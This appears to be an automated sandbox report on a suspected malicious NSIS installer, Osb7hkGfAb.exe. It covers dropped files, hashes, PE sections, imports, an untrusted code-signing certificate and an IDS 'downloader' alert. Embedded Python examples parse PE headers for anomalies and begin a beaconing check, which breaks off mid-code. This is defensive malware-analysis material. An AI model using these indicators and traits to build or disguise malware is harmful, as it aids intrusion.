                                                                        SSDEEP:3072:TxsXh+JF13htt8PqX5tMt86Z3XfXA2QqtG0i3xDW4+E/lXSIjfOxVaXm2:TKXS1x70vXbDGNMGxScOHa1
                                                                        MD5:87B5C774E173976A2E28F1BA83D0AF19
                                                                        SHA1:84F517D61D4108AF7970FD480EF38F84C69508DD
                                                                        SHA-256:D3ADC7A77CF3BED6B58380322BE620D613085797830847ACEF8BAC9B88E14F7A
                                                                        SHA-512:D3AAFC404CF4F24AC2A75B0EFB3F815D7B53A3B96132122B490531B488BF04FF4AE5444744FDE22C14B8DCD943AA82AE77350A0247D705C08485D7A1C26AB5F7
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:...r.....R....pp..FF.........i...a......................v....R......R..###........................*...................c. ......................o........U................................,..............D......................wwww.....+..$....h...HH............FF.........&...KKKKKK..D............m......_..).l..".......R..L....[.............$.........y.y....t................444............D...........2.&&...~.z.......TT...EEEE.l..........VVVV..F...........................__..........+...>>.........xxx...c.k........1............rrrr............{{..............l........................j........................_...mm.........j...........*.............FFFFF..................;;;....zz....................................M............6.......@....'.......$...................;..........<<..........,....I..............Y...999.......................`......@..ff.................................................]....................tt.......`.....v..............|||./........vv.E.qq.. ....O..........{
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):441234
                                                                        Entropy (8bit):2.643055597561025
                                                                        Encrypted:false
                                                                        SSDEEP:1536:QZmWsnh5l4WzxPFhMOzNJoDb8glX1rYrkbN39D8e7A7Sg2gGqAXr2bHLopKRJ8No:ot0r3reuPrpL/7zB7nMWi0FThhJtG4
                                                                        MD5:B3702DCDA1481DA4539338C0B2D6E4EB
                                                                        SHA1:40A2001A107BE6C3D4587D8E5FF5FAEFA6C61A1B
                                                                        SHA-256:F2F2395066AB9072911FC0D46DAA8DFB2C7AEFB30BE7DAB9B7BBDC7583B9A94F
                                                                        SHA-512:AAB912267A32EA594A37BFB57F002AB8340C2CD94C2EB21E37ECE375F899D01207C48E8BF9429FB7CC302E5F17D8F8DF17EA208450D26F416A0372D2BCA245AE
                                                                        Malicious:false
                                                                        Reputation:low
                                                                         Preview:
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):485127
                                                                        Entropy (8bit):1.2565961974341746
                                                                        Encrypted:false
                                                                        SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                                        MD5:580D05E679E74B036B55CA8E5FF32769
                                                                        SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                                        SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                                        SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                                        Malicious:false
                                                                        Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):389868
                                                                        Entropy (8bit):1.2469892412772452
                                                                        Encrypted:false
                                                                        SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                                        MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                                        SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                                        SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                                        SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                                        Malicious:false
                                                                        Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):442363
                                                                        Entropy (8bit):1.2533707838755617
                                                                        Encrypted:false
                                                                        SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                                        MD5:5465B75724C031B21C018F7D72941F72
                                                                        SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                                        SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                                        SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                                        Malicious:false
                                                                        Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):521
                                                                        Entropy (8bit):4.284169749449499
                                                                        Encrypted:false
                                                                        SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                                        MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                                        SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                                        SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                                        SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                                        Malicious:false
                                                                        Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):720
                                                                        Entropy (8bit):3.2583835496355245
                                                                        Encrypted:false
                                                                        SSDEEP:12:8wl0bsXyllEzKYGlnEEkvEEv3w/g/iCNJkKAP4t2YZ/elFlSJm:8s2CzKJvs+/4i2HAFqy
                                                                        MD5:1DD416959B3A61611C699B9C51E589D0
                                                                        SHA1:6C955BC97130A942608C2525257E2E877CFBFAF9
                                                                        SHA-256:FB67473E5157A26E60B1C53C81948DEDCBBAEC23B68E2B17CD335A7830FD963F
                                                                        SHA-512:3DD9311979FA9471D46B0FFA8D81B5191BBE753ED0115484E11FB0C812B313C6CF87109D567BB4AA7DDBC52F9F453308C910394D831C6A6FA2127A56A96FDFFA
                                                                        Malicious:false
                                                                        Preview:L..................F........................................................9....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.b.r.o.k.\.D.i.s.a.n.n.e.x...A.n.d.3.7.".C.:.\.U.s.e.r.s.\.b.r.o.k.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.544810246742741
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Osb7hkGfAb.exe
                                                                        File size:887'424 bytes
                                                                        MD5:a09950fd9af3c4e3ff6f778ab5d8ce0f
                                                                        SHA1:043462f3e5a9b3133908c39e6c3fd8a4f0cade1b
                                                                        SHA256:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6
                                                                        SHA512:316f36143bfb519a3fd27766960f8c758867da2df52463b7373431c2788811c11823c06fe4934e990102c9c2039feb010a501ddaa99274973dd0024f192fa3c2
                                                                        SSDEEP:24576:QiGFaq43NvC0vEFsNtiqnRCujTrlLq9u4J/QOeaa:QiGFu3NvnEFsNtRdu9u4J/qaa
                                                                        TLSH:DC15122AF700D9AAD4708F718D9ED256EBD07E2828200BAB7F997B4BBD72051D01F255
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@
                                                                        Icon Hash:0e13672535353f1c
                                                                        Entrypoint:0x403348
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:ced282d9b261d1462772017fe2f6972b
                                                                        Signature Valid:false
                                                                        Signature Issuer:CN="Customhouses Bagdres Landsale ", E=Vincula@algorithms.Tum, L=Montrose, S=Colorado, C=US
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                         Not Before:19/02/2024 01:47:06
                                                                         Not After:18/02/2027 01:47:06
                                                                        Subject Chain
                                                                        • CN="Customhouses Bagdres Landsale ", E=Vincula@algorithms.Tum, L=Montrose, S=Colorado, C=US
                                                                        Version:3
                                                                        Thumbprint MD5:6E7AA7D21C7430FFA93D1D5E81C70DD6
                                                                        Thumbprint SHA-1:5E5C2F65106F0C48F10C0B17A665BA4A7F3796B1
                                                                        Thumbprint SHA-256:9FC97C7BD25A0D8FFAED412DBDA9127DE53CBC6E6B4395C7D8146B5291551423
                                                                        Serial:29E0A557697DB56E97230C2F058F9E9DD1580106
                                                                        Instruction
                                                                        sub esp, 00000184h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor ebx, ebx
                                                                        push 00008001h
                                                                        mov dword ptr [esp+18h], ebx
                                                                        mov dword ptr [esp+10h], 0040A198h
                                                                        mov dword ptr [esp+20h], ebx
                                                                        mov byte ptr [esp+14h], 00000020h
                                                                        call dword ptr [004080B8h]
                                                                        call dword ptr [004080BCh]
                                                                        and eax, BFFFFFFFh
                                                                        cmp ax, 00000006h
                                                                        mov dword ptr [0042F42Ch], eax
                                                                        je 00007FD5A0B98363h
                                                                        push ebx
                                                                        call 00007FD5A0B9B4C6h
                                                                        cmp eax, ebx
                                                                        je 00007FD5A0B98359h
                                                                        push 00000C00h
                                                                        call eax
                                                                        mov esi, 004082A0h
                                                                        push esi
                                                                        call 00007FD5A0B9B442h
                                                                        push esi
                                                                        call dword ptr [004080CCh]
                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                        cmp byte ptr [esi], bl
                                                                        jne 00007FD5A0B9833Dh
                                                                        push 0000000Bh
                                                                        call 00007FD5A0B9B49Ah
                                                                        push 00000009h
                                                                        call 00007FD5A0B9B493h
                                                                        push 00000007h
                                                                        mov dword ptr [0042F424h], eax
                                                                        call 00007FD5A0B9B487h
                                                                        cmp eax, ebx
                                                                        je 00007FD5A0B98361h
                                                                        push 0000001Eh
                                                                        call eax
                                                                        test eax, eax
                                                                        je 00007FD5A0B98359h
                                                                        or byte ptr [0042F42Fh], 00000040h
                                                                        push ebp
                                                                        call dword ptr [00408038h]
                                                                        push ebx
                                                                        call dword ptr [00408288h]
                                                                        mov dword ptr [0042F4F8h], eax
                                                                        push ebx
                                                                        lea eax, dword ptr [esp+38h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push ebx
                                                                        push 00429850h
                                                                        call dword ptr [0040816Ch]
                                                                        push 0040A188h
                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                         Name | Virtual Address | Virtual Size | Is in Section
                                                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
                                                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x41dd0 | .rsrc
                                                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd7720 | 0x1360 |
                                                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6457 | 0x6600 | f6e38befa56abea7a550141c731da779 | False | 0.6682368259803921 | data | 6.434985703212657 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1380 | 0x1400 | 569269e9338b2e8ce268ead1326e2b0b | False | 0.4625 | data | 5.2610038973135005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | 17edd496e40111b5a48947c480fda13c | False | 0.4635416666666667 | data | 4.133728555004788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x30000 | 0x28000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x58000 | 0x41dd0 | 0x41e00 | 51f103b856396aac282c5bd5a24beff1 | False | 0.6063619248102466 | data | 5.8960782160116745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
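The data-directory and section tables above can be regenerated and sanity-checked with a stdlib-only parser. What follows is an added example, not Joe Sandbox's code and not taken from the sample: it reads the COFF header, the PE32 optional header, the data directories and the section table, computes per-section entropy the way the Entropy column does, and tags the things a reverser would look at in this report: a section with no raw data at all (.ndata), a section far larger in memory than on disk (.data is 0x25538 bytes in memory and 0x600 on disk), writable code, high-entropy data, and a SECURITY directory that points into the overlay. Because the sample itself is not on the page, the input is a constructed PE that reuses the report's section names, RVAs and characteristics; .data and .ndata keep the report's virtual sizes so those two anomalies reproduce, the other sections are shrunk to a few hundred synthetic bytes, and a zero-filled blob stands in for the certificate.

```python
import math
import random
import struct

# Data directory order from winnt.h; SECURITY (index 4) holds a file offset, not an RVA.
DIR_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
             "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
             "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
CNT_CODE, CNT_INIT, CNT_UNINIT = 0x20, 0x40, 0x80
MEM_EXEC, MEM_READ, MEM_WRITE = 0x20000000, 0x40000000, 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, as in the Entropy column; 0.0 for an empty section such as .ndata."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(v) for v in range(256)) if c) if n else 0.0


def parse_pe(blob: bytes) -> dict:
    """Read the COFF header, PE32 optional header, data directories and section table."""
    pe_off = struct.unpack_from("<I", blob, 0x3C)[0]                 # e_lfanew
    if blob[:2] != b"MZ" or blob[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, pe_off + 4)
    opt_off = pe_off + 24
    if struct.unpack_from("<H", blob, opt_off)[0] != 0x10B:
        raise ValueError("only PE32 is handled here; the sample is a 32-bit PE")
    n_dirs = struct.unpack_from("<I", blob, opt_off + 92)[0]         # NumberOfRvaAndSizes
    dirs = {DIR_NAMES[i]: struct.unpack_from("<II", blob, opt_off + 96 + 8 * i) for i in range(min(n_dirs, 16))}
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt_off + opt_size + 40 * i)
        raw = blob[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize, "rawptr": rawptr,
                         "rawsize": rawsize, "chars": chars, "entropy": shannon_entropy(raw)})
    end = max(s["rawptr"] + s["rawsize"] for s in sections)
    # overlay: (offset where the last section's raw data ends, number of bytes after it)
    return {"machine": machine, "dirs": dirs, "sections": sections, "overlay": (end, len(blob) - end)}


def triage(pe: dict) -> dict:
    """Per-section anomaly tags, plus where the Authenticode blob sits relative to the sections."""
    tags = {}
    for s in pe["sections"]:
        t = []
        if s["rawsize"] == 0 and s["vsize"]:
            t.append("virtual-only")          # .ndata: the name the NSIS stub uses for its uninitialised data
        elif s["vsize"] > 4 * s["rawsize"]:
            t.append("vsize>>rawsize")        # .data in the report: 0x25538 in memory, 0x600 on disk
        if s["chars"] & MEM_EXEC and s["chars"] & MEM_WRITE:
            t.append("rwx")
        if s["entropy"] > 7.0:
            t.append("high-entropy")
        tags[s["name"]] = t
    off, size = pe["dirs"].get("SECURITY", (0, 0))
    if size:
        start, length = pe["overlay"]
        t = ["signature-in-overlay"] if off >= start else ["signature-inside-sections"]
        if off + size > start + length:
            t.append("signature-truncated")
        tags["SECURITY"] = t
    return tags


def build_sample_pe() -> bytes:
    """Constructed input (the sample is not on the page): the report's section names, RVAs and flags;
    .data/.ndata keep the report's virtual sizes, the rest hold a few hundred synthetic bytes;
    a 0x100-byte overlay and a zero-filled 0x1360-byte stand-in certificate follow the sections."""
    rng = random.Random(1587621)
    def rand(n): return bytes(rng.getrandbits(8) for _ in range(n))
    layout = [  # name, virtual size, RVA, raw bytes, characteristics
        (b".text", 0x600, 0x1000, rand(0x600), CNT_CODE | MEM_EXEC | MEM_READ),
        (b".rdata", 0x208, 0x8000, b"KERNEL32.dll\0" * 40, CNT_INIT | MEM_READ),
        (b".data", 0x25538, 0xA000, bytes(0x600), CNT_INIT | MEM_READ | MEM_WRITE),
        (b".ndata", 0x28000, 0x30000, b"", CNT_UNINIT | MEM_READ | MEM_WRITE),
        (b".rsrc", 0x400, 0x58000, rand(0x400), CNT_INIT | MEM_READ),
    ]
    raw_ptr, sec_hdrs, raw = 0x200, b"", b""                        # headers fit in the first 512 bytes
    for name, vsize, va, data, chars in layout:
        ptr = raw_ptr + len(raw) if data else 0
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(data), ptr, 0, 0, 0, 0, chars)
        raw += data
    overlay, cert = b"\xAA" * 0x100, bytes(0x1360)
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2], dirs[12] = (0x8544, 0xA0), (0x58000, 0x41DD0), (0x8000, 0x29C)
    dirs[4] = (raw_ptr + len(raw) + len(overlay), len(cert))         # certificate sits after the overlay
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 6, 0, 0x6600, 0x44000, 0x28000, 0x3000, 0x1000, 0x8000,
                      0x400000, 0x1000, 0x200)
    opt += struct.pack("<HHHHHHIIIIHHIIIIII", 4, 0, 0, 0, 4, 0, 0, 0x9A000, 0x200, 0, 2, 0x8000,
                       0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    headers = b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\0\0"
    headers += struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, len(opt), 0x102) + opt + sec_hdrs
    return headers.ljust(raw_ptr, b"\0") + raw + overlay + cert


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print({s["name"]: (hex(s["vsize"]), hex(s["rawsize"]), round(s["entropy"], 2)) for s in pe["sections"]})
    print(triage(pe))
```

On the real file the SECURITY check is the one worth running first: the directory places the certificate at file offset 0xd7720, while the raw data of the five sections adds up to 0x4a000 bytes, so the bulk of the file is overlay between the last section and the signature, which is where an NSIS-style installer carries its payload. The "invalid certificate" verdict in the signature list refers to that appended blob; the section hashes above do not cover it.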
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x583b8 | 0x130ca | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.998410786148207
RT_ICON | 0x6b488 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.40775464332189754
RT_ICON | 0x7bcb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.4554866512507883
RT_ICON | 0x85158 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.462218045112782
RT_ICON | 0x8b940 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4729667282809612
RT_ICON | 0x90dc8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.46835144071799717
RT_ICON | 0x94ff0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5149377593360995
RT_ICON | 0x97598 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5457317073170732
RT_ICON | 0x98640 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6073770491803279
RT_ICON | 0x98fc8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6719858156028369
RT_DIALOG | 0x99430 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x99530 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x99650 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x99718 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x99778 | 0x92 | Targa image data - Map 32 x 12490 x 1 +1 | English | United States | 0.7191780821917808
RT_VERSION | 0x99810 | 0x27c | data | English | United States | 0.5
RT_MANIFEST | 0x99a90 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
Language of compilation system | Country where language is spoken | Map
English | United States | -
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T16:02:25.047759+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49708 | 142.250.184.238 | 443 | TCP
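The alert fires on a single connection (client port 49708), but the packet table that follows shows the sample opening a fresh TLS session to each of the two servers roughly every twelve seconds. The script below is an added example, not part of the report or of Joe Sandbox: it parses rows in the report's column order (timestamp, source port, destination port, source IP, destination IP), rebuilds bidirectional flows, and measures how regular the connection start times per server are, which is the usual first check for beaconing. The embedded rows are a subset transcribed from the packet table (the opening packets of the first connection, then the first packet of every later connection); the `max_cv` and `min_gaps` thresholds are assumptions, not values from the report.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Subset transcribed from the report's packet table (opening packets of the first connection,
# then the first packet of each later connection), in the report's column order:
# timestamp | source port | dest port | source IP | dest IP. Nothing here is invented.
PACKETS = """\
Jan 10, 2025 16:02:23.761857986 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:23.761888981 CET | 443 | 49708 | 142.250.184.238 | 192.168.2.10
Jan 10, 2025 16:02:23.762059927 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
Jan 10, 2025 16:02:23.885025978 CET | 49708 | 443 | 192.168.2.10 | 142.250.184.238
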